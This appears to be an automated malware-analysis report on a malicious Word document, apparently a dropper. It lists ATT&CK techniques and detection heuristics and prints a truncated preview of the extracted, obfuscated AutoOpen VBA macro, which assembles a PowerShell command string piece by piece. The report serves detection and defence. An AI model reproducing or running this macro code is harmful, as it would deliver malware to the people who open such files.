MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes Shell() and CreateObject() calls, and attempts to construct a string that appears to be a URL or command. The heuristic 'SE_CLIPBOARD_COMMAND_LURE' indicates the document may instruct the user to paste content into a shell, further suggesting malicious intent. The ClamAV detection 'Doc.Dropper.Agent-7079654-0' confirms its classification as a dropper.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-7079654-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7079654-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69386 bytes |
SHA-256: 2c6bf572a5548ceee6fa0a0b3e42f766afcfb997a58d493736644d37b5f472e1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function iueif()
MsgBox ""
End Function
Sub AutoOpen()
Const iizeokv09 = False
Const kbwsfc_o = False
Const wrnoshw_f = False
Const uo_aj = False
Const ygcmwa = True
Const iutaysc0 = False
Const ykjrgcpko07 = False
If 29 * 88 = 6229 Then
Const kdaaxv8 = True
Const frzifyi22 = True
Const utzik = False
Const usrivkbt = False
Const iedvrld = False
Const ayrra = True
Const vrms_uuue = False
ElseIf 26 - 30 = -4 Then
edj_kel63 = "$oaibfxvjiowlxxw_iekfpfyiu"
Else
Const ixziidc = True
Const nqiyvlnjo = False
Const auen = False
Const dgaae3 = True
Const aavkdi = True
Const amgbzzfee5 = True
Const eya_y = True
Const kzxqxl = False
End If
Select Case "oxg_uvfet"
Case fb_yepwoy88
Const oh_esbg = True
Const pd_yixk = False
Const uwpnrw_yu = True
Case 10687
Const mpiqlja = True
Const kgukqt = False
Const iefqrke6 = True
Case "oxg_uvfet"
cfxl_gfv = "uoycid='org/C"
edj_kel63 = edj_kel63 + cfxl_gfv
End Select
Const iy_cntgsm = False
Select Case "sxnrui"
Case iiaxsqezu
Const ipfdayz = False
Case "sxnrui"
evpyiai = "J';$n"
Const dukh_a = False
Const iv_iwb = False
edj_kel63 = yaby + edj_kel63 + evpyiai + oahtaaa30
Case 20072
Const zmoeio = False
End Select
Const acugley4 = True
Select Case 81 * 88
Case 7128
anooioa = "atpxmhofkbbeb_huseu"
edj_kel63 = edj_kel63 + anooioa + vqton
End Select
Select Case 15 - 36
Case -21
edj_kel63 = edj_kel63 + "eei='ojqa';$owaizbpyuao" + ixcei
End Select
If 71 - 38 = 33 Then
kbezdzzytq = edj_kel63
Const uepe02 = False
y_qhab = "yyawtzcwqygabpqs"
kbezdzzytq = ev_vrz + kbezdzzytq + y_qhab
End If
Const twwfkh_sym = False
Select Case "uoaoyvr_j"
Case "uoaoyvr_j"
kbezdzzytq = hajsds + kbezdzzytq + "rqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz" + xdiab
End Select
Const psiakke = True
Select Case 32 - 88
Case -56
iauah50 = "='e]$ojqa0';$mdroaen"
kbezdzzytq = kbezdzzytq + iauah50
End Select
Select Case "fzur95"
Case "fzur95"
puugo = "b_esuwo='ient).';$w"
kbezdzzytq = ajvgf_pxsvpo + kbezdzzytq + puugo + zhjwh
End Select
Const lcwao = False
Select Case 54 + 62
Case acnqf_cdq
Const snovlglksy0 = False
Const kcc_dgp = False
Const uitloclo = True
Case 116
gmuoalb = "vmbvwoxkjuhj"
kbezdzzytq = kbezdzzytq + gmuoalb
End Select
Const atujhsfo = False
Select Case "uonbxia"
Case "uonbxia"
kbezdzzytq = xayjh + kbezdzzytq + "t='($env:a';$mzoiuddeyaj"
Case 25741
Const udcuyugx = True
Const zyneoe = False
End Select
If 76 * 76 = 5776 Then
wft_ewhmncs = eidryso + kbezdzzytq
Const fnoodljwk = False
xuhiouy = "lqncmnrvpotqghzbopauau='($';$tco"
wft_ewhmncs = uydhm_dx + wft_ewhmncs + xuhiouy + oqgnsyjxv
Else
End If
Const xiqvwh = False
Const zshjcccwm = False
If 35 * 9 = 315 Then
okixpzcsjw00 = wft_ewhmncs
Const rvjqaglo = True
Const wochoeu = True
yupexujf = "zygiwfcyinfvnu"
okixpzcsjw00 = okixpzcsjw00 + yupexujf
End If
Const zqrtv = False
If 17 - 6 = 23 Then
ElseIf 90 - 18 = 72 Then
aqcyi = nckgw + okixpzcsjw00
Const oeoznne = True
vnopuaqenz6 = "_euqaocnlecylzi='br"
aqcyi = aqcyi + vnopuaqenz6 + a_rgzwur
Else
End If
If 56 - 49 = 7 Then
aqcyi = aqcyi + "';$q"
End If
Const yeuea = True
If 2219 >= 7013 Then
Const nocvezb = True
Const oqptte = True
Const mftti = False
Const ywau45 = True
Const aprgt = False
Const dgyaa = False
Else
t_rpssijwpl = Environ("SystemRoot")
End If
Const iqkmdt28 = True
If 9919 < 1932 Then
Const xdtbea = False
Const aiwob = True
Const tdmczx = True
Const ctp_zke = False
Const pvigvpsei = False
Const wlm_drj = True
Const ubwobxoxj = True
ElseIf 5087 < 7189 Then
phyktrv = aqcyi
Const eeee_e = True
uaegz = "cyeatbinwxsmezc_h"
phyktrv = phyktrv + uaegz
Else
Const zltot3 = False
Const ekwgejdr = True
Const oftudd = True
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.